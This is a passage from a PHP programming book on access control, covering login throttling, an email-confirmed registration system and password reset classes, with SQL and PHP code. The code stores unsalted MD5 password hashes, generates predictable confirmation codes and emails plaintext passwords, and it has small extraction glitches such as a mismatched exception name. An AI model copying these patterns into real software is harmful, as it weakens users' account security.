automated software to do so. The solution is to build a mechanism that counts the number of failed attempts using a session variable. Every time the number of failures is divisible by three (such as when three incorrect passwords are entered), use PHP’s sleep function to delay the next attempt by, for example, ten seconds. You may also decide that, after a certain threshold value (15 failed attempts, for example), you block all further access from that IP address for
  • 321. Access Control 297 a given period, such as one hour. Of course, changing an IP address is easy for a determined intruder, but you’ll stall would-be intruders, at least, and perhaps make their lives difficult enough to persuade them to pursue their nefarious activities elsewhere. How do I build a registration system? Having an authentication system is fine, but how will you fill it with users in the first place? If only yourself and a few friends will access your site, you can probably create accounts for all users through your database administration interface. However, for a site that’s intended to become a flourishing community to which anyone and everyone is free to sign up, you’ll likely need to automate this process. You’ll want to allow visitors to register themselves, but you’ll probably conduct some level of “screening” so that you have at least a little information about the people who have signed up, such as a way to confirm their identities. A common and effective screening approach is to have the registrants confirm their email address. The purpose of the screening mechanism is to give you the ability to make it difficult for those users who have “broken the rules” in some way and lost their account privileges to create new accounts. You have their email addresses, or at least one of their email addresses—if they try to register again with that address, you can deny them access. Be warned, though: a new type of Internet service is becoming popular. Pioneered by Mailinator, these services provide users with temporary email addresses that they can use for registrations. This, of course, means email is not a fool-proof screening mechanism, but it is still a worthwhile addition to a registration system. Solution Here, we’ll put together a registration system that validates new registrants using their email addresses, and in turn, sends them an email that asks them to confirm their registration via a URL. A registration system is yet another great opportunity to build more classes! This time, though, it will be even more interesting, as we use the PEAR::HTML_QuickForm9 package and PEAR::Mail_Mime10 to do some of the work for the registration system. 9 http://pear.php.net/package/HTML_QuickForm/ 10 http://pear.php.net/package/Mail_Mime/
  • 322. 298 The PHP Anthology The rest will be handled by classes we’ll build, but the end result will be easy for you to customize and reuse in your own applications. First of all, we need to understand the process of signing up a new user: ■ The user fills in the registration form. ■ Upon the user’s completion of the form, the registration system inserts a record into the signup table and sends a confirmation email. ■ The visitor follows the link in the email and confirms the account. ■ We copy the details from the signup table to the user table. The account is now active. We use two tables for handling signups: this way, we can separate the “dangerous” or unverified user data from the “safe” or confirmed user data. You’ll need a cron job or similar scheduled task to check the signup table on a regular basis and delete any entries that are older than, say, 24 hours. Our separation of the tables makes it easier to purge the contents of the signup table (and avoid unfortunate errors), and keep the user table trim so that there’s no unnecessary impact on performance during user authentication. Our solution uses a specific database structure. Here’s the SQL for the signup table: access_control.sql (excerpt) CREATE TABLE signup ( signup_id INT(11) NOT NULL AUTO_INCREMENT, login VARCHAR(50) NOT NULL DEFAULT '', password VARCHAR(50) NOT NULL DEFAULT '', email VARCHAR(50) DEFAULT NULL, firstName VARCHAR(50) DEFAULT NULL, lastName VARCHAR(50) DEFAULT NULL, signature TEXT NOT NULL, confirm_code VARCHAR(40) NOT NULL DEFAULT '', created INT(11) NOT NULL DEFAULT '0', PRIMARY KEY (signup_id), UNIQUE KEY confirm_code (confirm_code), UNIQUE KEY user_login (login), UNIQUE KEY email (email) );
  • 323. Access Control 299 Here’s the SQL for the user table: access_control.sql (excerpt) CREATE TABLE user ( user_id INT(11) NOT NULL AUTO_INCREMENT, login VARCHAR(50) NOT NULL DEFAULT '', password VARCHAR(50) NOT NULL DEFAULT '', email VARCHAR(50) DEFAULT NULL, firstName VARCHAR(50) DEFAULT NULL, lastName VARCHAR(50) DEFAULT NULL, signature TEXT NOT NULL, PRIMARY KEY (user_id), UNIQUE KEY user_login (login) ); The SignUp Class The first part of our solution is the SignUp class, which provides all the functionality for signing up new users, and uses the following configuration settings: access_control.ini (excerpt) ; Access Control Settings ;user login table details [users_table] table=user col_id=user_id col_login=login col_password=password col_email=email col_name_first=firstName col_name_last=lastName col_signature=signature ;signup login table details [signup_table] table=signup col_id=signup_id col_login=login col_password=password col_email=email col_name_first=firstName
  • 324. 300 The PHP Anthology col_name_last=lastName col_signature=signature col_code=confirm_code col_created=created The first group of settings represent the details of the user table in our database—the name of the database and its columns. The second group represent the database and column names of the signup table. Let’s define some custom exception classes so that we can provide a consistent level of error handling: Signup.class.php (excerpt) class SignUpException extends Exception { public function __construct($message = null, $code = 0) { parent::__construct($message, $code); error_log('Error in '.$this->getFile(). ' Line: '.$this->getLine(). ' Error: '.$this->getMessage() ); } } class SignUpDatabaseException extends SignUpException {} class SignUpNotUniqueException extends SignUpException {} class SignUpEmailException extends SignUpException {} class SignUpConfirmationException extends SignUpException {} Our base class, SignUpException, is a custom exception that ensures the exception details are logged using the error_log function. The subclasses represent different exception situations that might arise during the signup process. This method of error handling implementation ensures that all exceptions are logged consistently, and allows any script that uses our SignUp class to implement custom logic to handle the various types of exceptions. We’ll see how such logic can be implemented in our script very soon. We begin our SignUp class definition with the class properties:
  • 325. Access Control 301 Signup.class.php (excerpt) class SignUp { protected $db; protected $cfg; protected $from; protected $to; protected $subject; protected $message; protected $html; protected $listener; protected $confirmCode; $db will contain a PDO instance for our database connection, $cfg will store our configuration details, $from will contain the name and address used in the confirm­ ation email’s From field, $to will contain the name and address the email is sent to, $subject will contain the subject of the email, $message will represent the body of the email, and $html will contain a true or false value to indicate whether or not the email is an HTML email. The $listener property will contain the URL listed as the email confirmation link and $confirmCode will contain the unique code needed to confirm this particular user’s registration. The $to and $confirmCode properties are set and used internally by the class, while the rest of the properties are initialized by the class constructor: Signup.class.php (excerpt) public function __construct(PDO $db, $listener, $frmName, $frmAddress, $subj, $msg, $html) { $this->db = $db; $this->cfg = parse_ini_file('access_control.ini', TRUE); $this->listener = $listener; $this->from[$frmName] = $frmAddress; $this->subject = $subj; $this->message = $msg; $this->html = $html; }
  • 326. 302 The PHP Anthology When we instantiate the object in the constructor above, we need to pass it a PDO object instance containing the connection to the database, the URL to which regis­ trants should be directed when they confirm their signups, a Sender name and From address for use in the signup email (for example Your Name <you@yoursite.com>), and the subject and message for the email itself. Finally, we need to identify whether or not this is an HTML email, so that PEAR::Mail_Mime can format the message correctly. Whether it contains HTML or not, the message should contain at least one special tag: <confirm_url/>. This acts as a placeholder in the message, identifying the location in the email body at which the confirmation URL, built by the SignUp class, should be inserted. The createCode method is called internally within the class, and is used to generate the confirmation code that will be sent via email: Signup.class.php (excerpt) private function createCode($login) { srand((double)microtime() * 1000000); $this->confirmCode = md5($login . time() . rand(1, 1000000)); } When the registration form is submitted, the createSignup method creates a record of the registration request. The createSignup method takes the information the user submits via the registration form, checks the database to ensure that the username and email address do not already exist in the user table, and inserts a new record into the signup table. Let’s take a look at how this method works: Signup.class.php (excerpt) public function createSignup($userDetails) { $user_table = $this->cfg['users_table']['table']; $user_login = $this->cfg['users_table']['col_login']; $user_pass = $this->cfg['users_table']['col_password']; $user_email = $this->cfg['users_table']['col_email']; $user_first = $this->cfg['users_table']['col_name_first']; $user_last = $this->cfg['users_table']['col_name_last'];
  • 327. Access Control 303 $user_sig = $this->cfg['users_table']['col_signature']; $sign_table = $this->cfg['signup_table']['table']; $sign_login = $this->cfg['signup_table']['col_login']; $sign_pass = $this->cfg['signup_table']['col_password']; $sign_email = $this->cfg['signup_table']['col_email']; $sign_first = $this->cfg['signup_table']['col_name_first']; $sign_last = $this->cfg['signup_table']['col_name_last']; $sign_sig = $this->cfg['signup_table']['col_signature']; $sign_code = $this->cfg['signup_table']['col_code']; $sign_created = $this->cfg['signup_table']['col_created']; try { $sql = "SELECT COUNT(*) AS num_row FROM " . $user_table . " WHERE " . $user_login . "=:login OR " . $user_email . "=:email"; $stmt = $this->db->prepare($sql); $stmt->bindParam(':login', $userDetails[$user_login]); $stmt->bindParam(':email', $userDetails[$user_email]); $stmt->execute(); $result = $stmt->fetch(PDO::FETCH_ASSOC); } catch (PDOException $e) { throw new SignUpDatabaseException('Database error when' . ' checking user is unique: '.$e->getMessage()); } First, we assign all the needed configuration settings to local variables to improve the readability of our script. The first action the method performs is to complete a database query: it counts the number of rows in the user table where the submitted username matches the value in the login column in the database, or where the submitted email address is a match to the value in the email column. We wrap this action within a try {…} catch (PDOException $e) {…} block in case a PDOException is thrown. When we catch the PDOException, we throw one of the custom exceptions we wrote for this class—a SignUpDatabaseException. The next step for the createSignup method is to check the results of the query and, if it’s okay to proceed, to prepare the data for insertion into the signup table:
  • 328. 304 The PHP Anthology Signup.class.php (excerpt) if ($result['num_row'] > 0) { throw new SignUpNotUniqueException( 'username and email address not unique'); } $this->createCode($userDetails[$user_login]); $toName = $userDetails[$user_first] . ' ' . $userDetails[$user_last]; $this->to[$toName] = $userDetails[$user_email]; If, on the other hand, the result is not 0, it indicates that we already have a user with that username or email address, and it’s not okay to proceed with the signup. Our reaction is to throw another one of our custom exceptions, this time a SignUpNotUniqueException, to indicate that the signup details are not unique. The final step in the createSignup method is to insert the new registration into the signup table: Signup.class.php (excerpt) try { $sql = "INSERT INTO " . $sign_table . "(". $sign_login . ", " . $sign_pass . ", " . $sign_email . ", " . $sign_first . ", " . $sign_last . ", " . $sign_sig . ", " . $sign_code . ", " . $sign_created . ") ". "VALUES (:login, :password, :email, :firstname, :lastname, :signature, :confirm, :time)"; $stmt = $this->db->prepare($sql); $stmt->bindParam(':login', $userDetails[$user_login]); $stmt->bindParam(':password', $userDetails[$user_pass]); $stmt->bindParam(':email', $userDetails[$user_email]); $stmt->bindParam(':firstname', $userDetails[$user_first]); $stmt->bindParam(':lastname', $userDetails[$user_last]); $stmt->bindParam(':signature', $userDetails[$user_sig]); $stmt->bindParam(':confirm', $this->confirmCode); $stmt->bindParam(':time', time()); $stmt->execute();
  • 329. Access Control 305 } catch (PDOException $e) { throw new SignUpDatabaseException('Database error when' . ' inserting into signup: '.$e->getMessage()); } } All the data in the $userDetails variable—the details submitted via the registration form—are inserted into the signup table. If a PDOException is thrown, we throw a new instance of our SignUpDatabaseException class. The sendConfirmation method is used to send a confirmation email to the person who’s just signed up: Signup.class.php (excerpt) public function sendConfirmation() { // Pear Mail_Mime included in the calling script $fromName = key($this->from); $hdrs = array( 'From' => $this->from[$fromName], 'Subject' => $this->subject ); $crlf = "n"; if ($this->html) { $replace = '<a href="' . $this->listener . '?code=' . $this->confirmCode . '">' . $this->listener . '?code=' . $this->confirmCode . '</a>'; } else { $replace = $this->listener . '?code=' . $this->confirmCode; } $this->message = str_replace('<confirm_url/>', $replace, $this->message ); $mime = new Mail_mime($crlf);
  • 330. 306 The PHP Anthology $mime->setHTMLBody($this->message); $mime->setTXTBody(strip_tags($this->message)); $body = $mime->get(); $hdrs = $mime->headers($hdrs); $mail = Mail::factory('mail'); $succ = $mail->send($this->to, $hdrs, $body); if (PEAR::isError($succ)) { throw new SignUpEmailException('Error sending confirmation' . ' email: ' .$succ->getDebugInfo()); } } The sendConfirmation method will generate the content of the confirmation email, in HTML or text, by replacing the special text <confirm_url/> with the confirmation URL the user will need to click on to confirm the registration. The confirmation URL is generated using the $listener property, set by the class constructor method, and the unique code returned by the confirmCode method. sendConfirmation then uses an instance of the PEAR::Mail_mime class to create and send the email. If an error is generated with the sending of the email, another one of our custom excep­ tions, SignUpEmailException, will be thrown. We’ll also use the getDebugInfo method of the PEAR_Error object to obtain some information about the error. Finally, the confirm method is used to examine confirmations via the URL sent in the email: Signup.class.php (excerpt) public function confirm($confirmCode) { $user_table = $this->cfg['users_table']['table']; $user_login = $this->cfg['users_table']['col_login']; $user_pass = $this->cfg['users_table']['col_password']; $user_email = $this->cfg['users_table']['col_email']; $user_first = $this->cfg['users_table']['col_name_first']; $user_last = $this->cfg['users_table']['col_name_last']; $user_sig = $this->cfg['users_table']['col_signature']; $sign_table = $this->cfg['signup_table']['table']; $sign_id = $this->cfg['signup_table']['col_id']; $sign_login = $this->cfg['signup_table']['col_login'];
  • 331. Access Control 307 $sign_pass = $this->cfg['signup_table']['col_password']; $sign_email = $this->cfg['signup_table']['col_email']; $sign_first = $this->cfg['signup_table']['col_name_first']; $sign_last = $this->cfg['signup_table']['col_name_last']; $sign_sig = $this->cfg['signup_table']['col_signature']; $sign_code = $this->cfg['signup_table']['col_code']; try { $sql = "SELECT * FROM " . $sign_table . " WHERE " . $sign_code . "=:confirmCode"; $stmt = $this->db->prepare($sql); $stmt->bindParam(':confirmCode', $confirmCode); $stmt->execute(); $row = $stmt->fetchAll(); } catch (PDOException $e) { throw new SignUpDatabaseException('Database error when' . ' inserting user info: '.$e->getMessage()); } Again, we assign configuration settings to local variables to improve the script’s readability. First, the confirm method selects from the signup table all records that have a value in the confirm_code column that matches the $confirmCode value. If the number of records returned is anything other than 1, a problem has occurred and a SignUpConfirmationException exception is thrown: Signup.class.php (excerpt) if (count($row) != 1) { throw new SignUpConfirmationException(count($row) . ' records found for confirmation code: ' . $confirmCode ); } If only one matching record is found, the method can continue to process the con­ firmation:
  • 332. 308 The PHP Anthology Signup.class.php (excerpt) try { // Copy the data from Signup to User table $sql = "INSERT INTO " . $user_table . " ( " . $user_login . ", " . $user_pass . ", " . $user_email . ", " . $user_first . ", " . $user_last . ", " . $user_sig . ") VALUES ( :login, :pass, :email, :firstname, :lastname, :sign )"; $stmt = $this->db->prepare($sql); $stmt->bindParam(':login',$row[0][$sign_login]); $stmt->bindParam(':pass',$row[0][$sign_pass]); $stmt->bindParam(':email',$row[0][$sign_email]); $stmt->bindParam(':firstname',$row[0][$sign_first]); $stmt->bindParam(':lastname',$row[0][$sign_last]); $stmt->bindParam(':sign',$row[0][$sign_sig]); $stmt->execute(); $result = $stmt->fetch(); // Delete row from signup table $sql = "DELETE FROM " . $sign_table . " WHERE " . $sign_id . "= :id"; $stmt = $this->db->prepare($sql); $stmt->bindParam(':id', $row[0][$sign_id]); $stmt->execute(); } catch (PDOException $e) { throw new SignUpDatabaseException('Database error when' . ' inserting user info: '.$e->getMessage()); } } } If an account is successfully confirmed, the record is copied to the user table, and the old record is deleted from the signup table. Thus the confirmation process, the user’s registration, and our SignUp class, is complete! The Signup Page Now that our SignUp class is done, we need a web page from which to display the registration form and run the process.
  • 333. Access Control 309 The first step is to include the classes we’ll use: signup.php (excerpt) <?php error_reporting(E_ALL); require_once 'SignUp.class.php'; require_once 'HTML/QuickForm.php'; require_once 'Mail.php'; require_once 'Mail/mime.php'; require 'dbcred.php'; First, because we’re using PEAR packages, which will cause E_Strict errors under PHP 5, we set the error reporting level to E_ALL with the error_reporting function. Of course, we need to include our SignUp class file. We’ll also be using the PEAR HTML_Quickform and Mail_mime packages. The dbcred.php file contains the database credentials we’ll need to connect to our database. Next, we create the variables we need: signup.php (excerpt) $reg_messages = array( 'success' => array( 'title' => 'Confirmation Successful', 'content' => '<p>Thank you. Your account has now been' . ' confirmed.<br />You can now <a href="access.php">login' . '</a></p>' ), 'confirm_error' => array( 'title' => 'Confirmation Problem', 'content' => '<p>There was a problem confirming your' . ' account.<br />Please try again or contact the site ' . 'administrators</p>' ), 'email_sent' => array( 'title' => 'Check your email', 'content' => '<p>Thank you. Please check your email to ' . 'confirm your account</p>' ), 'email_error' => array( 'title' => 'Email Problem',
  • 334. 310 The PHP Anthology 'content' => '<p>Unable to send confirmation email.<br />' . 'Please contact the site administrators.</p>' ), 'signup_not_unique' => array( 'title' => 'Registration Problem', 'content' => '<p>There was an error creating your' . ' account.<br />The desired username or email address has' . ' already been taken.</p>' ), 'signup_error' => array( 'title' => 'Registration Problem', 'content' => '<p>There was an error creating your' . ' account.<br />Please contact the site administrators.' . '</p>' ) ); $listener = 'http://localhost/phpant2/chapter_10/examples/' . 'signup.php'; $frmName = 'Your Name'; $frmAddress = 'noreply@yoursite.com'; $subj = 'Account Confirmation'; $msg = <<<EOD <html> <body> <h2>Thank you for registering!</h2> <div>The final step is to confirm your account by clicking on:</div> <div><confirm_url/></div> <div> <b>Your Site Team</b> </div> </body> </html> EOD; The $reg_messages variable contains an array of page titles and messages that will be used in the web page, depending on the stage and status of the registration process. $listener, $frmName, $frmAddress, $subj, and $msg are required by our Signup class. If you have a look at the $msg variable, the body of our confirmation email, you’ll see the special <confirm_url/> code which will be replaced by the confirm­ ation URL later in the process.
  • 335. Access Control 311 The $listener variable stores the absolute URL of the script to which the confirm­ ation code should be submitted. It links to itself in our example script. This variable is set to reflect the folder setup of our testing environment, so make sure you change this variable to suit your own setup. The next step is to set up our database connection and instantiate our SignUp object: signup.php (excerpt) try { // Instantiate the PDO object for the database connection $db = new PDO($dsn, $user, $password); $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); // Instantiate the signup class $signUp = new SignUp($db, $listener, $frmName, $frmAddress, $subj, $msg, TRUE); Notice also that we’re opening a try block to catch any exceptions that may be thrown from the execution of the rest of the code. Any exceptions caught after this point—if the PDO connection fails for example—will display an appropriate message on the web page, instead of showing a PHP error. The next step is to check whether the page is being requested as part of a confirma­ tion—we’ll check for the presence of the $_GET['code'] variable: signup.php (excerpt) if (isset($_GET['code'])) { try { $signUp->confirm($_GET['code']); $display = $reg_messages['success']; } catch (SignUpException $e){ $display = $reg_messages['confirm_error']; } }
  • 336. 312 The PHP Anthology If the confirmation code is present, we call the SignUp->confirm method, supplying the code the page received. We then set the $display variable, which will contain the page title and message to display on our web page. If no exception was raised from the confirm method at this point in the script, we can assume all went well and set the $display variable to the success message. If, however, a SignUpException exception was thrown, we set the $display variable to the con­ firmation_error message. You may remember that the SignUpException class was the base class for all our custom exceptions. By catching this class of exception, we’ll catch an instance of any of our custom exceptions. If the confirmation code is not present, we prepare to display the registration form: signup.php (excerpt) else { function cmpPass($element, $confirmPass) { $password = $GLOBALS['form']->getElementValue('password'); return $password == $confirmPass; } function encryptValue($value) { return md5($value); } The above are helper functions that will be used by our HTML_Quickform object to validate and filter the registration form contents. The HTML_Quickform object makes it very easy to construct the form and the form validation: signup.php (excerpt) /* Make the form */ // Instantiate the QuickForm class $form = new HTML_QuickForm('regForm', 'POST'); // Register the compare function $form->registerRule('compare', 'function', 'cmpPass');
  • 337. Access Control 313 // The login field $form->addElement('text', 'login', 'Desired Username'); $form->addRule('login', 'Please provide a username', 'required', FALSE, 'client'); $form->addRule('login', 'Username must be at least 6 characters', 'minlength', 6, 'client'); $form->addRule('login', 'Username cannot be more than 50 characters', 'maxlength', 50, 'client'); $form->addRule('login', 'Username can only contain letters and numbers', 'alphanumeric', NULL, 'client'); // The password field $form->addElement('password', 'password', 'Password'); $form->addRule('password', 'Please provide a password', 'required', FALSE, 'client'); $form->addRule('password', 'Password must be at least 6 characters', 'minlength', 6, 'client'); $form->addRule('password', 'Password cannot be more than 12 characters', 'maxlength', 12, 'client'); $form->addRule('password', 'Password can only contain letters and numbers', 'alphanumeric', NULL, 'client'); // The field for confirming the password $form->addElement('password', 'confirmPass', 'Confirm Password'); $form->addRule('confirmPass', 'Please confirm password', 'required', FALSE, 'client'); $form->addRule('confirmPass', 'Passwords must match', 'compare', 'function'); // The email field $form->addElement('text', 'email', 'Email Address'); $form->addRule('email', 'Please enter an email address', 'required', FALSE, 'client'); $form->addRule('email', 'Please enter a valid email address', 'email', FALSE, 'client'); $form->addRule('email', 'Email cannot be more than 50 characters', 'maxlength', 50, 'client');
  • 338. 314 The PHP Anthology // The first name field $form->addElement('text', 'firstName', 'First Name'); $form->addRule('firstName', 'Please enter your first name', 'required', FALSE, 'client'); $form->addRule('firstName', 'First name cannot be more than 50 characters', 'maxlength', 50, 'client'); // The last name field $form->addElement('text', 'lastName', 'Last Name'); $form->addRule('lastName', 'Please enter your last name', 'required', FALSE, 'client'); $form->addRule('lastName', 'Last name cannot be more than 50 characters', 'maxlength', 50, 'client'); // The signature field $form->addElement('textarea', 'signature', 'Signature'); // Add a submit button called submit // and "Send" as the button text $form->addElement('submit', 'submit', 'Register'); /* End making the form */ After we’ve defined the registration form, we use the HTML_Quickform->validate method to check that the form has been submitted and that it validates. If it does validate, we can proceed to build the array of form data our SignUp object needs to create a new signup record: signup.php (excerpt) if ($form->validate()) { // Apply the encryption filter to the password $form->applyFilter('password', 'encryptValue'); // Build an array from the submitted form values $submitVars = array( 'login' => $form->getSubmitValue('login'), 'password' => $form->getSubmitValue('password'), 'email' => $form->getSubmitValue('email'), 'firstName' => $form->getSubmitValue('firstName'),
  • 339. Access Control 315 'lastName' => $form->getSubmitValue('lastName'), 'signature' => $form->getSubmitValue('signature') ); Since we’re using HTML_Quickform, any slashes added by magic quotes are automat­ ically removed from the submitted values; when you’re not using HTML_Quickform, be sure to strip out the slashes if magic_quotes is enabled. Next, we call the create the signup record and send the confirmation email. We want to wrap this in a try block in order to catch any possible exceptions: signup.php (excerpt) try { $signUp->createSignup($submitVars); $signUp->sendConfirmation(); $display = $reg_messages['email_sent']; } catch (SignUpEmailException $e) { $display = $reg_messages['email_error']; } catch (SignUpNotUniqueException $e) { $display = $reg_messages['signup_not_unique']; } catch (SignUpException $e) { $display = $reg_messages['signup_error']; } } If no exceptions are thrown, we can set $display to an appropriate message that informs the user to expect the email. If exceptions are thrown, we can set $display to a message that’s appropriate for each one, thanks to our defining of several custom exception classes. If the form hasn’t been submitted yet, it’ll need to be shown to the user; we set $display to include the form HTML source:
  • 340. 316 The PHP Anthology signup.php (excerpt) else { // If not submitted, display the form $display = array( 'title' => 'New Registration', 'content' => $form->toHtml() ); } } } We’ve reached the end of the first try block, so we need to catch any remaining ex­ ception that may be thrown. If an exception is caught here, it won’t be one of our custom exceptions. Therefore, we need to make sure that the exception details are logged using the error_log function, and that the web page displays an appropriate message to inform the user that registration cannot be completed: signup.php (excerpt) catch (Exception $e) { error_log('Error in '.$e->getFile(). ' Line: '.$e->getLine(). ' Error: '.$e->getMessage() ); $display = $reg_messages['signup_error']; } ?> Now, the only task left to do is to produce the HTML source for the web page. Our $display variable has been set to an array value containing two elements—one for the page title and one for the page contents. This setting will display the registration form and a confirmation message, or an error message if something has gone wrong. These displays are inserted into the source code where appropriate:
  • 341. Access Control 317 signup.php (excerpt) <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> ⋮ HTML Head contents… </head> <body> <h1><?php echo $display['title']; ?></h1> <?php echo $display['content']; ?> </body> </html> The finished registration form should look like the one shown in Figure 10.3. Figure 10.3. The finished registration form And there we have it—a simple but fully functioning user registration system with email confirmation facility!
  • 342. 318 The PHP Anthology Discussion So that you don’t grow bored, I’ve left a couple of pieces of the jigsaw puzzle for you to fill in yourself. If a registered user exists who has the same username or email address as the one entered by the new registrant, the createSignup method throws an exception and the procedure is halted. If you’re happy using HTML_QuickForm, you might want to split this check into a separate method that HTML_QuickForm can apply as a validation rule for each field in the form. This approach should reduce frustration when users find that the account name they chose already ex­ ists—HTML_QuickForm will generate a message to inform them of this fact, preserve the rest of the values they entered, and allow them to try again with a different username. If you plan to let users change their email addresses once their accounts are created, you’ll also need to confirm the new addresses before you store them in the user table. You should be able to reuse the methods provided by the SignUp class for this purpose. You might even consider reusing the signup table to handle this task. Some modifications will be required—you’ll want the confirm method to be able to update an existing record in the user table, for example. Be very careful that you don’t create a hole in your security, though. If you’re not checking for existing records in the user table, a user could sign up for a new account with details that match an existing row in the user table. You’ll then end up changing the email address of an existing user to that of a new user, which will cause you some embarrassment, at the very least. How do I deal with members who forget their passwords? Unfortunately, humans have a tendency to forget important information such as passwords, so a feature that allows users to retrieve forgotten passwords is an essen­ tial time saver. Overlook this necessity, and you can expect to waste a lot of time manually changing passwords for people who have forgotten them. If you encrypt the passwords in your database, you’ll need a mechanism to generate a new password that, preferably, is easy to remember.
  • 343. Access Control 319 Be Careful with Password Hints A common tactic used in web site registration is to use simple questions as memory joggers should users forget their password. These questions can include “Where were you born?” and “What’s your pet’s name?” Yet details like this may well be common knowledge or easy for other users to guess. Solution Since we already have a valid email address for each account, as confirmed through our signup procedure in “How do I build a registration system?”, we just need to send the new password to that address. Our solution uses the user table from the previous sections: access_control.sql (excerpt) CREATE TABLE user ( user_id INT(11) NOT NULL AUTO_INCREMENT, login VARCHAR(50) NOT NULL DEFAULT '', password VARCHAR(50) NOT NULL DEFAULT '', email VARCHAR(50) DEFAULT NULL, firstName VARCHAR(50) DEFAULT NULL, lastName VARCHAR(50) DEFAULT NULL, signature TEXT NOT NULL, PRIMARY KEY (user_id), UNIQUE KEY user_login (login) ); The AccountMaintenance Class The AccountMaintenance class is a utility class that, among other things, will reset the password for a user’s account and generate an email to send the user the new password. Our class uses the following configuration settings: access_control.ini (excerpt) ; Access Control Settings ;web form variables e.g. $_POST['login'] [login_vars] login=login
  • 344. 320 The PHP Anthology ;user login table details [users_table] table=user col_id=user_id col_login=login col_password=password col_email=email col_name_first=firstName col_name_last=lastName To provide a consistent level of error handling, we define some custom exception classes: AccountMaintenance.class.php (excerpt) class AccountException extends Exception { public function __construct($message = null, $code = 0) { parent::__construct($message, $code); error_log('Error in '.$this->getFile(). ' Line: '.$this->getLine(). ' Error: '.$this->getMessage() ); } } class AccountDatabaseException extends AccountException {} class AccountUnknownException extends AccountException {} class AccountPasswordException extends AccountException {} class AccountPasswordResetException extends AccountException {} Our base class, AccountException, is a custom exception that ensures the exception details are logged using the error_log function. The subclasses represent different exception situations that might arise during account maintenance. We begin our AccountMaintenance class definition with the class properties:
  • 345. Access Control 321 AccountMaintenance.class.php (excerpt) class AccountMaintenance { protected $db; protected $cfg; private $words; $db will contain a PDO instance for our database connection, $cfg will store our configuration details, and $words will store the path to the random words file that’s used in password generation. The constructor simply stores the database object for future use by the class and loads the configuration file: AccountMaintenance.class.php (excerpt) public function __construct(PDO $db) { $this->db = $db; $this->cfg = parse_ini_file('access_control.ini', TRUE); } Since we save the user’s password in the database as an MD5 hash (a form of one- way encryption), we can no longer find out what the original password was. If members forget their passwords in such cases, you’ll have to make new ones for them. You could simply generate a random string of characters, but it’s important to remember that if you make your security systems too unfriendly, you’ll put off legitimate users. The resetPassword method generates a more human-friendly randomized password: AccountMaintenance.class.php (excerpt) function resetPassword($login, $email) { //Put the cfg vars into local vars for readability $user_table = $this->cfg['users_table']['table']; $user_id = $this->cfg['users_table']['col_id']; $user_login = $this->cfg['users_table']['col_login']; $user_pass = $this->cfg['users_table']['col_password']; $user_email = $this->cfg['users_table']['col_email'];
  • 346. 322 The PHP Anthology $user_first = $this->cfg['users_table']['col_name_first']; $user_last = $this->cfg['users_table']['col_name_last']; $user_sig = $this->cfg['users_table']['col_signature']; try { $sql = "SELECT " . $user_id . ", " . $user_login . ", " . $user_pass . ", " . $user_first . ", " . $user_last . " FROM " . $user_table . " WHERE " . $user_login . "=:login AND " . $user_email . "=:email"; $stmt = $this->db->prepare($sql); $stmt->bindParam(':login', $login); $stmt->bindParam(':email', $email); $stmt->execute(); $row = $stmt->fetchAll(PDO::FETCH_ASSOC); } catch (PDOException $e) { throw new AccountDatabaseException('Database error when' . ' finding user: '.$e->getMessage()); } First, we assign the configuration settings to local variables to make the code a little more readable. Next, we deal with the resetPassword method, which, when given a combination of a username and an email address, attempts to identify the corres­ ponding row in the user table. We use both the username and email to identify the row, so it’s a little more difficult for other people to reset your members’ passwords. Although there’s no risk of in­ dividuals stealing the new password (unless they have control over a member’s email account), it will certainly irritate people if their passwords are continually being reset. Requiring both the username and email address of the user makes the process a little more complex. If we can’t find a single matching row, we throw an exception:
  • 347. Access Control 323 AccountMaintenance.class.php (excerpt) if (count($row) != 1) { throw new AccountUnknownException('Could not find account'); } Next, we call the generatePassword method (which we’ll discuss in a moment) to create a new password: AccountMaintenance.class.php (excerpt) try { $password = $this->generatePassword(); This method call is placed within a try block to catch the exception thrown by generatePassword if a new password cannot be generated. generatePassword then updates the user table with the new password (using md5 to encrypt it), and returns the new password in an array containing the user details: AccountMaintenance.class.php (excerpt) $sql = "UPDATE " . $user_table . " SET " . $user_pass . "=:pass WHERE " . $user_id . "=:id"; $stmt = $this->db->prepare($sql); $stmt->bindParam(':pass',md5($password)); $stmt->bindParam(':id', $row[0][$user_id]); $stmt->execute(); } catch (AccountPasswordException $e) { throw new AccountResetPasswordException('Error when' . ' generating password: '.$e->getMessage()); } catch (PDOException $e) { throw new AccountDatabaseException('Database error when' .
  • 348. 324 The PHP Anthology ' resetting password: '.$e->getMessage()); } $row[0][$user_pass] = $password; return $row; } The addWords method is used to supply the class with an indexed array of words with which to build memorable passwords: AccountMaintenance.class.php (excerpt) function addWords($words) { $this->words = $words; } I’ve used a list of over one thousand words, stored in a text file, to build memorable passwords. Be aware that if anyone knows the list of words you’re using, cracking the new password will be significantly easier, so you should create your own list. generatePassword constructs a random password from the AccountMaintenance->words array, adding separators that can include any number from 0 to 9, or an underscore character: AccountMaintenance.class.php (excerpt) protected function generatePassword() { $count = count($this->words); if ($count == 0) { throw new AccountPasswordException('No words to use!'); } mt_srand((double)microtime() * 1000000); $seperators = range(0,9); $seperators[] = '_'; $password = array(); for ($i = 0; $i < 4; $i++) { if ($i % 2 == 0) { shuffle($this->words); $password[$i] = trim($this->words[0]);
  • 349. Access Control 325 } else { shuffle($seperators); $password[$i] = $seperators[0]; } } shuffle($password); return implode('', $password); } } The password itself will contain two words chosen at random from the list, as well as two random separators. The order in which these elements appear in the password is also random. The passwords this system generates might look something like 7correct9computer and 48courtclothes, which follow a format that’s relatively easy for users to remember. The Reset Password Page There’s one thing we need to finish our web site’s account maintenance feature: we need a web form that our users can fill in to request a password change or reset. First, we include all the packages we need: newpass.php (excerpt) <?php error_reporting(E_ALL); require_once 'Session.class.php'; require_once 'AccountMaintenance.class.php'; require_once 'HTML/QuickForm.php'; require_once 'Mail.php'; require_once 'Mail/mime.php'; require_once 'dbcred.php'; We then set the error reporting level to E_ALL with the error_reporting function, since we’re using PEAR packages that will cause E_Strict errors under PHP 5. Of course, we need to include our AccountMaintenance class file. We’ll also be using the PEAR HTML_Quickform and Mail_mime packages. The dbcred.php file contains the database credentials we’ll need to connect to our database. Next, we create the variables we need:
